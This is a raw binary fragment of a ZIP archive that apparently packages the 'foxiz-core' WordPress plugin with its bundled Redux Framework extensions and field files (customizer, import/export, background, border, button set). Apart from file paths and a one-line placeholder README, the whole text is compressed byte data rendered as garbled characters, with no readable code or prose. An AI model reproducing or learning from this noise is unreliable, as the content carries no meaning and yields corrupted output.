[|mh#qmql qDF>fRW1 Xl^W9DX :V:Q W:=? YiPI.2s LQFh# K(/pAN R-aC+*>Fhw@& Rp #t?h:q@90܏5oJ[$tpc _8z{ a~-@|AbdwG!O,܄C6 '{ H`L',0.4 4[i>?C#~S@Ԡ{C\ a_G-4l2?~զ &̙T: y0'XXlGz 2:'1zU1SQ_n8CMl&{FЧ/_8LU7["4\\3zŚ>+[ѥ@Q.6MzwH&ȏ}PqCVqj6~[&pfZ>լˆ_ +c*vn84}XHųc{W!`4q4ז7rhy˸C;ccs9jfKY Nux@ܒ[doo|󀯕WMoQIKrS_u4ۃ9Jۈx:E9$u]&7;H09^r֬FA2/YHcuQja 7Cx `0*W;PDܩP-$rJ[l 1v$T6T l(5uc&ꝀCZV*T.Ehd7l]bY˓ cm[絶4AoS n 49 eǚ|K*Y6 ^?zuztx g-]SQa6lhtt?۱ӗPKYR^zcTfoxiz-core/lib/redux-framework/inc/extensions/customizer/extension_customizer.min.jsXmo۶+P8"+ɾ]y +{fk02U(>lɑ/M-<36XbK_q|yfK)7c#_3H,JԥCp^dZFWf0J)aC]۲?w4%Em]uFB.ii}u$_.ޜMP68kr(Oarg }Y3%P3)d۫n}FQjhޱ䥟4_|]=C']/Ƀ5:ԵLL[ULEjɨwPd1"=xP+f:nmHWczǏ3 Y|.4 JN+UK4(%KK #%?2nmCL7ī(y8XqP(6K\z6Gs3f&u/'ZH/˟r9++l %FIxW,6M):/<ƅMrnjff_xw'Lo @ZuY@bu\V܍:`zNnzLq(/M^ٌ, ;Azӆ5ybX xZqfe wBlFB\6IX{e Jp)pGI5m1| `- ;PyI)`1yxvah$Fg2'8Y$~vh@?|˳@,paS֓ttLۆӐ<؇& ZY8Ta<-ŲYo8QI7Y<Hp?Px zH"v\ TX`ۆ&+ahxdIH3IYIтo"oeB+r"4Oa%&eM]gNI^Gqgt7(%,5/j@W0߁ C)L-2Þ:j4]-Z4Kqa(J%Igggl`ѤЪ\XZiEP+MlJ/"ꊉh4 C0ANF_sNe ƘYЧ|֊ދrr- Ȼ 't^$Y >ҍ#&vMnHBsH=ϵy8#aA..&X9xOoQ'/(L 82fuږϜ>0VT9f}ʌ|sXu1᰾Ji'2GoA:h|mYcԠA0CXx!Lv`HTՌF$($b `ՏҬk~p5.TԌ.Gq%.8Ɨ}i&9O@ki|a.F;4-6s, '&q뮽in,t*)w?.lc,M/QD)#s;OCxd^ǯn\yVZi.y \}2 Y泴ikVdm:MbA $pM4?'QM>rb*ˏpko}:2L'ǘ'c7 VcW w ý4~Cڷچ{~ܶj 8C\ox `5Rq{+h=qJCӍATC7l3;z&0Jp'ցlk`,9}u"&䘇ĺ"la73#FL G!NH{h'5#Ǹ5{z+Γf]]ˆ&dE om0-Z"ѳG{@OW90皋 z8`11ִ^B-% EPjO ;¦fp':~$gmEptwr7|I}[vr[#7tWhc x:o+8Bζ F}||! -Ơ'y75'L2oZC6Xuc( B^|$im7!5H`UVoB+&) CSSCN0/!>i=SXAFдUy߀SֹѱAҠRTK?yҌUs8윕qSE @dR/>yM $R!y,UTFFUu]T|/;R-;+xYs' :.kvLZ^5v_CL+{4 iaT .@x̘Gdq,THZ0*heKT~"XvAa\>by H{S~p*3M](o B({OcW/قryl] )6rYd GKW?l6SesZyf ir}tZ =zh!9F=ɘ~ڸ*X0a fݠSyx21ECeԗ辶j$=І.1 >b3Y1a Uw{.Q¿c܋dBwP؇81'\Sn\0)py'h_:de=e_F:l|s{D- i $ީD$"l*]Ҋ p5kX4^Hv`K݂gJN2vJlĆ˙޺xjhԆA7or:RT*#{<ӡuGL 'WȞED<*Tq&qM#>6B->^k ܈4|z%z3ZQ-ς?ЬI'S1t.V΋E lhvN1fZɅSw耯Z,'aFr֧E0mՙ-kxcMrIks',3]_&nj/6G!b@p`{0:V#@NѦveP *ףƆn%qwu2O Zԭ幉XO.cj+v[\ٶJ$UT_!·LAoal7"> +7l!90nsi9 =Z-h5 `j@ݐ?'&7d<~4/<|axʼwLD^*{zGDO|I2]!.SWM ⍘Z~ya@};mj_dzju_`z#=; B/<;P),27R@񢭸`C (w}=7= v2³"8{ Y-$`S1xWL@`]YR&.Q=*.oo?k=5D;2Tp7P˻GXJoA/Zbxɦ@&h9fm@% ɝj[_u@T Nurl6nwNT&Ws\Z˃e-~agKJ% LYq:OV]O1&ImMXiϼ]nL^8n+=EͰۤ i&NVO6nTK D*H:u(:$ǖ3L:\1]/ˇ]#e&ǬӬ(oJ\X_WPå+8vKې xVݜV9:mNamn餖v§L̨d.vgDtСi &*>e4gk ie)WU68;7v.vY04@]17x <Mw"yAZ]RCso7dMdI2|Fq_0Џw|_Ih4TWΈd{vV.a3h]m`R^!VneoVPrXL;E$ Fע[yu‰yk ׀ ~0NHQQ.V ֧9|y =f-˲`x}cMއY;mdfJfGTvO͋=cTU⭞:O8[m`fsibKVʪ_`9i r)Y+HVt n V& X L\k\ &'&6QmK yC0+OX ufSÛN J[21V^(>+y\M3~FSFYK! Ea t}o^_l3qW{L@61*7u^UYٴ U^}y^]_Z5|;]m0xf3iMM>|ܬ(̌a~sӜ0`P+6cssc*sm!+cZPJ +}2c)ѿ9`K*  X©Y+㛱f"Ι۲q'Xa$P k浽Ǫ%CvI֎g_eLZ ZpnI3v% ADb`+ugqg~GAD^c_|6_6 Cɠnҷu֟{6bbDBhgAk]7C!!N_q߽Ã{_K,)3~ݱwѻl?7I^ _%~م-|O|3@w\Øɩ-cߚJs U[3x䤈[ :wZjȏ?$ޞ~{>t KH,Q G¡Bא)BI{a]7 &vOEmemPKYREG` Rfoxiz-core/lib/redux-framework/inc/extensions/customizer/extension_customizer.scssUێ }WPE[eSR#"fb`@@K^oݮTU93g.$ dI~/{T%C` &LE^)ΙVm6k-)>h U?9n[_$jl%,s0ˡSyebg(y&rAZgȒx6;ky4E_/o&b\ 8"_zza¦/jZZ:#΋4, zʂKyw;! Beh켃"2&[n{[y뭺UމQݙ@G+^NEz/$N!Dcƨ-<;(Nn>54A _J%%>a\sLEэ8+$磚=Y-'JC+nxތcoz=pݵAH(ZRܭsXls)':̳ ۙ%ߛm+aM.hd܃3̊1\l3~rP-U}wK5E?Լ FzXW'~>>Md L;e9s bC!ΰa~ڒ4*q\#K'j1,wQd]OߣSn5!φ=cʜXGNw&PKkT=foxiz-core/lib/redux-framework/inc/extensions/customizer/inc/PKYRh Sfoxiz-core/lib/redux-framework/inc/extensions/customizer/inc/customizer_control.phpUM0+fJiCz.=sUUaL<k v 1: y3V c NqϔV1L"stcQϥвSχ7^ ~v͏IZU9+`SBR4(c/zTQX2XqR谒J0Ϣ_8]~msR1[kHmW{Guhnor "[\}0YV:d=&+^Ү+/__OR02+,b["'Zxt\I5ڹpxs%DАh̾S0Ql22JQDQIrϾ۩pDqñ=z;*Rs^[2q_y+Gsg+g-)Y{'6g״`,.j|pq ,V3l L4Z9K }'@-i0BGy+[~@Nȃu)b[p`(@w;TG%44$30=8qt`wO$.7w>5Z|H5G4SǏyw;E.=O?$$ K-E3}2)cݘ `(l|eԬ ˖RpVjY'SCKg{sF5:wfwNֱ/ێ bK">G< {3B'hZnu[\q 躌TlEEћ2+RB'MvPkbr>~CQH0 ǖ:^ ;ArȬ#U `O\ѾCӍ6G]p EVwUE6&R}ˠ:tvWHh.Bhq1?25vO 6LϝC"dF@C̎N{$h) [QCqײO, Mfs'?"_6koyf<;',tNiagIl60r /SGV<ٰŠ( n4o L-{EUNԶ=Q:Y?حIbNJ 1yFDl6 7,"Z_Xf ]߉ަ*k$c/ ?[&W x\vSݗZ݃n$0φ {f_4a~Ggehb](Ըs|}P JT;߄PZdݸ> ՔL'FÇooM\vj5\ 0lEךfe$ KX3oQ\Nبxw;8*j-&]f4YکX;[:MQݮ~+Rw6PKYR CzSfoxiz-core/lib/redux-framework/inc/extensions/customizer/inc/customizer_section.phpXߏ8~s5ji/tjmuU:!gw8$Vמ_x7av3??9.r* d<A3AsJ.K*J`D '##\P?6"&K#p1y9y۠cTg<4.wŠ4Vx0)QJq& W,ə6Z "LdEٹ%s)0˵~h@_*7 7t5O$u/UȲD,sT<2qr1]"('NHFYxKB%M2`>AI IbU yF#t}c#BZ\2wkणq>"5AT{n 0IJslj?P?.wt&J}]/_gbg:oyZ$ݱTU0ք{{\x%L +ZѐCEG5Xńtkk c:~yQ>T$3r&#RP{ؓ[+suXxxZUWδnS{\#YluŃػP숵=摖/Ǥr2Y;-!VS 0Mp nt{&Ϸõu{g~W1ICxpQSVe$jx+"aEn)xդGžrmg_6U$?Q{ c8l۷7! g8dF\<0c vaIL*E) Qr32$ 5Ic>҈ m2.O#IHus,\rbesny41,eہ"Z ޟJ]],It OdBͧa)$A1 g|[e]K?[D0 ʵnR]):CIBFU4#+?y68,hwXb*N~f!賝]n{S0M) P,N˰Ĥa[1Zݴn5;^d5SJN"7v !^!9ڿ֙~buL0\*S"<[TĸX~挓0,@l=vX9Ra8['qȤ}0Q}$?|uQJ<}I=ѥgW?Md '0| >1 9 YwfsHMWfNUdUs"}`Ey&^#Fc漕߬: $ۋWO9&F#U(Wr6 I\B09kgٔKMv\ QJkv} r$p΅`.^&-~þ~D¼t&'RŽ &CUNUgu7Վwi\;J]e]IًhF.4 _{77#~eI_$tL5O^.f3'H#OP9 ҄Dp n*['LnioQf*uh́@!c{2B l~Z=L,>4o5P[j~=Tˀ3LO9Cu0 tI^Sȣ 040"ՔFǮ +ŗ=B_?!5eQ$V5be|0gi7vNPH 9Ͱ3ȢKSH'R_u\l_0H#KI/_#CJYVJ߭I[)*eyJY4|JP++Մ|@2NgZ>PKYR۽ dfoxiz-core/lib/redux-framework/inc/extensions/import_export/import_export/field_import_export.min.jsVMk@+ dARJO4'w~81{glɒdvμyoܢ\Ek \1,PD;5{ܚl`mYocdq^%ڬ 6,8KX{\=b6]Yȕ%I'Ŋ$ 9oG>b d.̧JY"JȤC7-Q3cα(@8¢+r0ه Dy#?KXe`DRT΋JON ciN AÒtR(zIw.u3g$ zҢ~ñcXxg|:_5g [nՓV7
    ;9?q8I  =tBC2> J0f}qq22T:ù%GNUvlR6wlm tɬ(H<+r\MYtF=:ss{w~,3vfTW/ŋ t"n  M<C ^݆B߮.Oe=}w\)ٴgr_0cBdAeB?ӿbT }`M dKCGjxSM`~Xl?X.Ue* &~GJbeUJ1d:0 *0 )&ϋmz/110t1a=K27ڴ+u{/Tfقr 3QYfUM)Cf*ZkTt5UJx3ūA>`]=Sp±s[!f 54Kk#/ >j%)O5 5-Їi"J 7QwWpIkq2ʜ9`x1ZYa7Hh"<ܪN\G0i})OR,ވېڂBON-*&ry(1_׼GB gf> o(!p*b;nne)aBHH*;u(l'0dfWI1|ä?{p=H$yzEeMD,QRUZ_8`VzM$ 9g_ђ )|(MZM U$uxF]><ʠ%b_2"ͫpp@cKu[4| riUo=K%6_ ::YCIx`ov"z)4)'bBo]3qJޚt'`|ʴĵHO/Vn)hwmj׋@]8ZEa4/!%\ru#q7InbrxJ6mK$qs Sݳg_/)֝=&tt˕(n*B~ð;\(d\y.6$#S䈎Vǭ5d>aw7$'u5ڟ,_|6eC\v2M'Bۦo졋2Ln e:.^~ߑU8u gX< f7a~DG-e"\.^uRI]i]$5֣E}=I'2OIOY m;5OHY$a:,d,# c+[y6\ȸJoo t\0Ju#iCﵖ PKYR0L3obfoxiz-core/lib/redux-framework/inc/extensions/import_export/import_export/field_import_export.scssS.JM)-/*-/J,(H-RFKOI)Ts)AJfqANbB^~^5W-LKj\؊ĜTB@ML.S(.H̃H/RPv4q4jPKkT=foxiz-core/lib/redux-framework/inc/extensions/options_object/PKYR'A5Yfoxiz-core/lib/redux-framework/inc/extensions/options_object/extension_options_object.phpWmo6_q- ݆}Hn7pA[tҢ@Rv}GŶ,'a={YCcbs\JD!Y2ǰ9D,1FinƁT01OV}1*03jA&n>a S#i7z1Lk,k5ܖ@83\=@Nr T[uN * @0~d 2dz:5B.&> H&͌Ɏ`\iKJg_E?íako\PFJ.X!tdǃZoJI\LXC̉#$A^ O1p;O.=8HPNC(S@S#*GMH0C2FvOCˡlPN!C;uw~f6lC%vÆ&{-! u6Di3$!L-iV^e4ҒZ\:0W)l64hH~҆BT*SxIXÄ#u)$LhB܎~3sv¹c3*T>|tu]G2][ em&5qvE"0))l^np[+MrNX[\A@&Ɯ)!R jjs~Ѵ߁ShrUXH7}$O]ݪ^NƢT9m/nܠyfVhgsA)%\A3NˡLi } ?RO`xu]/ Е~hA\1N:hf Zv,h97K1+w%Nv*vׯ3ytf "Wzݻl{sYB8~>5OgYYjv57rʧjpnlڬ+kky樐,.8 3ffގ-;{UBF$)X[ƿsl-F[opS ߩ guiCF3CJMa7Q\i,.w1UhXDqDE\E(FhCv=!&1lvj[slcЮVIK^(HTQyO))Jv,4,o+죞w+X|^=լVk8۰CuEWRIKr~и-O:PKkTLfoxiz-core/lib/redux-framework/inc/extensions/options_object/options_object/PKYR}IU[dfoxiz-core/lib/redux-framework/inc/extensions/options_object/options_object/field_options_object.cssK })mZi4#6Bt{/ȭ8epLr"t!;%b6ih7l[!`\B֣R!m^PKYR-! cfoxiz-core/lib/redux-framework/inc/extensions/options_object/options_object/field_options_object.js}n0 ~ .-`hSM'ɐAw$;#EHQP[&@cټm=;|lW$!U# ˕$p'lc5/bW8@+ܨ k ӨxD}vӭgDN3Y=Rjdt[ }y{kr-֣s?LD\aC W:t<* |yTqeI dY(i'OLCʹ9*g`ƸmPեOi1u"VbǷ|%=~qpPp+6Z~ &s%Ҿ\Oߨſq48!xrOXFcT{˾$hq؎`\8= ]UO=ר* 9B^ 57e*[^Mt<_2 PKYRZ$zgfoxiz-core/lib/redux-framework/inc/extensions/options_object/options_object/field_options_object.min.jsN0_)J('8q $(u6Fj8CRvv%N'5,Uk bdu^556c+?Iz96Nb"Ӯ3${Ԑz KeP9E]>ŸW@Z)CZ+CmCЊn LR"h75OH_<;na5B] u,Aї!|ًЇ2H>rzPE ,;F1j8CrbB PKYRL=]Bdfoxiz-core/lib/redux-framework/inc/extensions/options_object/options_object/field_options_object.phpXmo6_q)l[/͒5[(h,j$ew$%Y%>cG/wϽx$L`D \ +.I JAZAOaSI L*8l4RPT,$Bc*H74b>e>%"!OdHXRrb<e^ C.'9vX12Ȑ'hLH6oŢRIgiɑ>\\ߍa#|FgȠBoZ8H"h Z9ʻdz{56-\^`7p7w n֎{=3 ",>K2 $K{SD )rLRIݶsr§Q\T!Hik;؋`ŕx$ӎ{+ 1%%wȣD+.*ňЅE*Qu92XR$03X`IӄㅐO2ZoM/6Kc_RѦ>_e6쭩t*6aYP!s`2)LoñQVS|<8V!AϚH,n YJsHAG' &Q{zzlnza޶,iT}# QkHqK.8$sij+F6qSϭ~҅sj4EK,Lݵ%aZw7<2N=T)OU΅,@fX 4=)V0d&x89Ɂ*`J:{z)9_YG.]fyS JStyx>|3~6 KH~5blJ-Zf@ǂ% f0}‹AU9Da}&4y@RE~K]p<j?&+9*=9JNYcTMV#\+U[ݜ.Su.5i3?8nrf7lVsi6dpuw[!)Rog[>B_vIx9uYTw==:CTP-6wrGB)/#yT9 /mj=_LIÆ^C5ʪ-PYuhjK*#MoDB'S&1l5Y6M#8Ɯ'|踭Y#^4ruΰԻ.^58MmI9u(Nk35g8I`.Y~> 3AALP˺=[m_PKYRocvefoxiz-core/lib/redux-framework/inc/extensions/options_object/options_object/field_options_object.scssE10 @=-!9MBie q2VG( F2X$T (fޡbiAoRo)젳0 PKYRT]@@8foxiz-core/lib/redux-framework/inc/extensions/README.txtThis directory is a placeholder for Redux Framework extensions. PKkT*foxiz-core/lib/redux-framework/inc/fields/PKkT5foxiz-core/lib/redux-framework/inc/fields/ace_editor/PKYR$]Ifoxiz-core/lib/redux-framework/inc/fields/ace_editor/field_ace_editor.cssA 0EwHi24&Zzw#S>`(x Q x|b elfH eKI J~7o8}"5Kh@̼?xw,j(]hN, Q PKYR"5xMfoxiz-core/lib/redux-framework/inc/fields/ace_editor/field_ace_editor.css.mape; @ zTs!"6A$#Os&w4>-YvQִX͖Zui. @!@J!R >$ g߾G@ؑʉyхqGIo}@ׅH&?c&mЮ^N*tOs[X+jT=e8J.=_PKYRӃ} Hfoxiz-core/lib/redux-framework/inc/fields/ace_editor/field_ace_editor.jsVM0W)R;hOUjWU$$vж8 qN.ICnfDAZ~tUF&0gDBV`H/q -qt/DT{k 2<}q=pp(ɉdWdz)歕 s@%4,W޹_`n/o*hKߚ;U,.Xp%jgp*ͮM0d@ >&i0?2sO)ݢ/ǣ78 qaG\&޺KW6 oޅbWgx:Xiqs3v%w:$>F+j&ZqCT?,a\t6z{[ 4z#z)zpl?4/PKYRQLfoxiz-core/lib/redux-framework/inc/fields/ace_editor/field_ace_editor.min.jsR_k0*E`VF^b]+t-wΜ`Rc~Ο]Sd#x XZdoFh2ޡfnԎި;_rʷƮ@pQ**!"A+69u|ԤN=Fȳ ˥Xnj{rd,Tq]K뉴{ xez|4 ט 38y!@,GDG M{l0+&gg zLMo/,g/x{j1JByUmD+G";3gg_|Q-3V`_2z϶^ ewn:i{/i_"YՍPw !ƉI9m%^r)#@mNI!?PKYR{>Ifoxiz-core/lib/redux-framework/inc/fields/ace_editor/field_ace_editor.phpXmOHί"TĥtPR R*TUbOgz fwmNN|מyvg0ZbEF8g "Ȩ&,L|& KT!pLn( xT"(LF|o(0a!ܦ!($7r<XBr3#Q=1&1?'C@LL!djF\L0(&eLi&< !OzD wv;7#bPÈ-!'tR)aBMIy:_z\\nG:p;];oj0Xc2@x( ;<%I0dc$_$#?}X:l&\AD=*\w24"mF -tOrrӘlfkp aP|cA9;f?̓DOwgu|$N"};X jtvz?ʑٽԯp)ڧ؃C&GLRI5J1|PIN^E,OPKkT5foxiz-core/lib/redux-framework/inc/fields/background/PKYRK`Ifoxiz-core/lib/redux-framework/inc/fields/background/field_background.cssMn zw]"0QAx$r׮Hag{yY#t[5;gāW:X  rԸ^PQ9̌6^nݖpXsi ՋXLkh8*5P :X=n\Fx9/ |x y}OqM˾ c?s<+ li8Id HH"'1Dʔt`"wPKYRy-MMfoxiz-core/lib/redux-framework/inc/fields/background/field_background.css.mapRN0+<*p!UQU(Bi6"w eY~m꼮)D6M^epΰ:A\x2 dO.M I!8|%P[ٽ${7kW`uM3`c `a *cI'Pڀ,Ȫ3Vmơp{e=.®Z~wP:}b,v;GSg1&U]$_Z]%W"͓"[c]Hkqˬ*,{٤yG7;PKYR*~ 4Hfoxiz-core/lib/redux-framework/inc/fields/background/field_background.jsko65u&95|+qwk%Hz %v; g?}zB_Xߒf%y+8dq XOYv}J,iАe{Fe1BÐdy[^%yK!BAX%?Ҙ|װh~r2%H} 64^3<3f@$SrF> I.2ぜ\)_q'HA.A>]6JFX>57E&*p'O8tJ$ȷ, L|E9L%].v\e&X$8~Y}^ԑbû%=k?+7p2ry:{G.ElAo1oӭGFR:3"6 Pw{Hԁ݆ĔQ2Y&HT% \_[>)͙BgH9:H TBm.b5 h(FdkamvC&Wqk0C qhyoZc%cf~l!XZyXQ# t>/j,-hǼuzͲ#(JWI:k>0b꠴f/ʉ0|ggyL̕Z`Hgo~FlhGO> 9|7k}j ,'XʨY۾mC`U4 C+@JRtյ&Kh _&6NwQ}& iyD0mJN/l Q܊TP q/lx.mQ@67r)?H mv%(SC;{e`>-AInޠSrw*p.7<טz.pTh2Eq%rY7.0Z3!˦hF{fȳh:h"əiv1*bcҝmtr*ݮօhO-޵g\_YbJWIO4ކ۪4wJc$ݦU}ETuov  9I*K(Z;2W2loE?PZ6߸"e>dN\ڍ4:&[=뙺h:PT ZUҚ*I%՚jFQlHg0A;H#zP|ʺ `E>Vs :7tAQLtُ<讪 NJY ѿ󤑌n|=Κfb౉GU& 9?w3:29U.  ww[Z,_Uր~uJ T@,+-)W6H3*wPZ'M@Xȷ(+ʟ`s _0jЛ;zX< [F,5lQ.JHOM4wcW}z,k$(G#3zξh uQpXYӂT39^_6>-M`{<# (:j Ӊ7,q2G4GLHU \=m6s+M `aa/};m)y[[\py`ho9A1_hÜyaCH\!<gu' ܿG>LLX{d^qRqZsS:E!켺}$VP_tBDVƊ::˧?L JD OP,ᾑ</J:`awb>{Y}P*BX;_#2]. /Pk@:ā )Y[dpFʧ$}aG9e $iKIg.~xusMojJ"L4&r< * ~!ͼy@gʂf3Hާcf&i-Oy% ^j{fyG@=# };C ¹gυ% .#Fm6Mݼ'Q͓$iRp736H+&*BR<2L;Vl-[a|XiUOL޳#Xi 1 +Jg-4``MK#o'DyIY>tEv'c$} `cc[ء'&4[/{Oaf)+Bv*j& Qz, l[0sIj{Zʭ*ipκ!;f:E/<*p//-$Wka;ܦغ51в4SmVHI4i]wY݂a2tmx4+:ݺ}&_71aK^/J"}荢e|E׷.dsѤ1 2C^_鵹T >g9LPKYR;=LZIfoxiz-core/lib/redux-framework/inc/fields/background/field_background.phpks6{~NNtʼn:&x4 Y)%@9j~x J2=EpwvAO~;}'O?](!yB)\ܺ '(%RA  qeڐ4iBĂA%'\^ 4qṛ!$>eyмEP kȌIBn&+rQI"a2 WnY%)4J@~?|%9|~x~~c@U2P)%n(9>=}qz@NN/__\䐜_yqxNޜ8 QCEs/O-O=VK(^w0urUَ霄>YǷ0E8Peލ{M奤@x:ˠN SNd2 7]$#˔ Lh1s!]8\EVnD#CV,Jy5c m 7U!KHBE( $qpFldG=$;jC^U vĂ 21m:_V858_eO=\)DOf ReOTĩP/_/:s* y`R|u*n-6⍛0 e[~EA8r@f)1u+-`KN8 cFbK:q}&Hs7=z ]0_O,Z'tt idCi>1ԂpyA Hw -{l Uʑ'6ANnr cM`}$D8b}s96a]JűTܪJũTJ3TŠRqEiFF3ɻ]Fנ_r+n/ݒ+8jXYզNK]JXG9 ~DJLȬ)1Y@ p1iKL %*=) ȧ-C3fj xL=[Wy}y|()l[DyBH~Xt2X0ߧ@A@“CF5F8 |-PA- EL&276?ź 0`ꪶNI3*m F|W{. JJP75A`wOy:»L}LH#wqA)@u⒘EA?u@aK0n)tkHb?oO@FS"FZ):jx-9v,bR.8;|hA`,lp@Šuhlߓ1( 'VzL/$GȾY!N~aae{D'cjP8,MĹ,Ӑ8js-(z2%7:.,85[oʊ{ʒ)6mQ?3pOԎL<PlNe P-QjQ0>8%P uu7u2Bf6S}ٌaI紂UtY.\.:HzohibvID5/QSj{<b5DQrsZYOEHqo=sm複lnasj[w&k]n.{n@炈<.G{]BW,"Z0eZΘ`V#v Gj\px•_I7떮BěrisàyfL6p?/]DKulG<iC5<',-LLd?N?pCMY`^8̸hU>0Uѽ}\+PId Lasf2h=Yqys&i|Tcm ䷚AymN?:tYet 5#ɧPBMqlC^Zܽw5f|ɛ2>[)s5b T;l5\SĔ'^ȐSd:9{Т !i#WGY0:k2b9wV>2)qVN$љ"j9~vlmV U>~lS*ifv `78MUu*"RYR\[9[+JLxTQ'/eiDuxl4ATu:lvsxfĝzJߡRc/<ʩķǾ)]cD'I-"+I[ ۓm.e-7[\'InBeO(O{p l=t8i-8z061d}2Aq/4Htmm?8Jli&ɒXHd0nx52lTJ1*zoC8LL)$tUivZc$ 8yv[O}+eMgQ8}cߢIG? ?rKqBъEaBA(oH Y)i[Y\ޚoѲ[lj8jB^]TP J U}jW6\SrT9jvXӝՏe`k{P{'YxmbJԴkYJ&x"=*F!}lipGHU&dPSw m8{9-nPjRoM.ցɅ%ht?3?~2͉>bqGJSjX 3dB~L˷ame0<8ip%|Pka!S={;f|$Sdj,EWa53C%)(`WA@0z;P$}}(1-fVLkOD!6jO/~ncv̼<ڲ Ou/㫨U̠;}Ŧkrq/L$;8z%Z0]Z 0d+qUJ`K~6״nTnOWeҕMMjQ[;a[8Ȩ{jK7+DHmCstB/垊u WGڙ癓+sƽ^'w 'LM4g T>kuL#ۥjA 9:wԩ/92 ՟tc3y$ >ͮ#U9liiuՆ+9mWSҩ֚V6UƤmGK8)չ+ơX T (\"[r7JʮʚPF/ij?mVͷċ1 h%ܗʥHd g˦'R>/PKYR"`pJfoxiz-core/lib/redux-framework/inc/fields/background/field_background.scssTn +衷9V_"_a`IZKv`KhwvvhUK>n?F%8ZqY;ӷ򈘡SL{!hx h3Q)V6HcZmTzT<# <qL5lĚEawV58-N0 w#A4 #Dl lHYFlVxq*ȣo҇'CkaLHRSR?DtjepQ~Ҿf .VHEh^A35R1XVFb^qnpҋľEeXu˲%,-neI YW²V'8hQ`PKkT1foxiz-core/lib/redux-framework/inc/fields/border/PKYRJnAfoxiz-core/lib/redux-framework/inc/fields/border/field_border.cssn0 m;j[pٛT(KKU)rIse5`  NPrfVUn]*$Y+ߏm]-;4\+b*IK%?TcvJyǛEΫu~5`P$4^N6yXLcϋ@Q /xXL5]@W׏6F:|< ~ŲoPg,k%nSPKYRW$Efoxiz-core/lib/redux-framework/inc/fields/border/field_border.css.mapeQ]K@|﯐{^DOsgg-AJ釈棑|Q&Anvfvv{qdUN4REeeWҙ }$4&Y zLEV?4lvFFӥ%c]yZcG0-5lqsM!цx,{doa05UB1L4e7Nb:+h5jAIat`Pa0ɑgpЄ~-B+>dS&;>$嵪>m6MQE_O*/PKYR7R5a@foxiz-core/lib/redux-framework/inc/fields/border/field_border.jsWo6_A%<сt0`{ hdaDxII%ʖtmxq~9"2 E$ W{2"h~bE9Ofk|V OYBrA&yDƅd_=F٭X}X+~FwW}"glY8!#b(hB֎b) ;zcI.BL ̒#kl-E4]-b+%(Ybi23g_Ur7^4 ƛگɆ$zTSG'ҸDQaRO>.x jcWE u'5>T!M: Qq?lgX+B0j-m9*kXuQzei+ .d5iE'@;堰g#`gTy"kT =֕(S`\HS3f#[ tLD`%͔d5Kx]Z+MCMQ˔ oFgj;4WWrцS%~;u%9'!4#i[ $"#+^ȷsNzcFabY#t8 7a3VM@O*N`ʠh!ָ1NJIca/E +KP et*{Pnkt7 ׿ [\PKYR6#ODfoxiz-core/lib/redux-framework/inc/fields/border/field_border.min.jsU]k0+F̌֍^bjHrߕ?:-ZsuRNjE:#S $^/ u69:9gKm+WodRI`'("tZn@9 kFeV.sVKf"h4#DZmHt4DHqȹ$h6Y.^IcXgRP C5`ˍŒHNx}M8rPk!y'&ƭ< z}VK1#@7W kkQ?MַD;8Sj4F>W1wx&~}?νU۔0HuMX_2}CV||wFf06k3p3}k`W|DE9n~nP$,@pgp̜6Ӧ;վnA Qڬt%/^Geh}AδGؕȾ65x.q:h]8&ax|Жyi^y924* x]yG\toB ~R=¢€AtF[<.PKYRe l t@Afoxiz-core/lib/redux-framework/inc/fields/border/field_border.php[ms۸_/:v;%8v*ͤiIBL<.^(R!R)nbbn^Nӝދ;0 '?IvK'R“3z@IN?& %L?{IFfI&sT8SJf$yGc_G, g,1$7|JCr-`R@NP mBgf~_LZa$*9|6v1X&) ` ="rMI$ڨɧ&|4ZzG*6K#a9X>߼&קg`399_^!`H>^ ?^\w%E(w:sT,rܟa9XdQˀ;'AWϓ4J9etBD _MHzMw)5wR?o("OBYuk3X}} o{@9~b2;rpxחcuQh}(5MbO0y ?dFw 90I βZlD &Eh " oș"ɺ!=Cf9<8)~/ڵ} ˌLZXΏrSoWKr@کM85Xlo])BW<ud<.'{6ٓ~.eOL< )QH>Ye (#2+^M3v(F^$D{f.0kHo$H3v ?9wGyCf4a絉Ӳ岂fC5'z([%('Hs^}8.(TmEQryBh%`fQVtJ5O$#tu"D2tVbQ%$Q9%":MDnI0y}:nӕk% kZ1i40,7Ghƍ5fگMTU^A&eA3mCq6:/秣ϯ>'gQQ{r6x7]| oFɁY@R'[ -&Fz[Xlbw!քBnbջ} %pp ,UnoY9z6=N7,}{,S:-\.Z')'8*Y*+Em=aTwXS{Bq%.c/u>X@Ҹ,ܓ[jfΝߜXa%cCF ^*< 3<~QiUh?Cx$8HB…E<` _iW`D<֔![&ߪ*lxn͠.ZG^߫;PtEoTF6[E/Vw ]oS8ܵ^ԏ$̼QgG2Jc‚$DT b=PQADHNcuT^f33"'2bƌSCI|DJMxL ɕΉ9ŐlHvE1 VJ{R^VUPNZN a\6)|/`cz'z$aQ2ƻ_lϭ8:皘nFu!Bp,`"wA"#iK5_R}z1 ^h }w#)WcɌj#x8vdhV5I\]oKӝ0vZV즫R+exSߺ櫋ealÝgɄNKK&e"zQGb4*k?d jϰ3sU"FTI|J13 0po{m4bT<2ݖRƎs a5[?` 1vti\~AR1?L-n0,7 If=hYt7ˮbZp:5UK?x)dyt,Ӂ@PbsK@5ߧzݦ,ikPot;iCtV>|[!봇U,It_E^oW1$UNo`t6ǀL!6YDNf@Ά:8P*jT"TlNv7%!ŻT8UԀbWuB'XY!Jaim,,d_׭UѮ#X\"ϭ+硴տ#(ܭy۵>>~A*>aJG-,-n-rRDw/Kd⇻Eb--13my4*ЬߪSkhDԏi4: Nī'$rWt7jY9U{K{BVå=KXbu=_y CV׆սmSjXCiX{('3kLuNؐu^@Z!rb>-ITkznm,il \W`@͌_f - aLRphjDw2\?Xlc\.,:XEyvbj*y5t^V ڕ "\r+p[XYy3;z59#l˳|)pwo%iv5:5 "Me9~JQ958v>D2/d9vܫn~%@ȼS !IZ(JU!xRanF ض]6W1,lXP@Ut_R)Tc5)džv7(gCq.K@Ui'p (ĤnkspԖw~̝|aD]|C;AƥJ64z?ym NQ~GoЃɄеo)7|W1RG ft7PKYRLfoxiz-core/lib/redux-framework/inc/fields/button_set/field_button_set.min.jsSn0~+UV'j9x(n8j;l(R%aa][qqfck dY :|@wn%7ry[qT\"4`Q>)8ѫuYڑ,{q)8U;\dN<+5O$N9/2jdJ_[)h6]f$ F+E9f(+_j=gp03AA )~ pۖ;4VFk=x;aI6w1 ^e+n5{\5RА0qi8!nGlBDe},YplKl2Krf4p.s?RBZ='._Eo 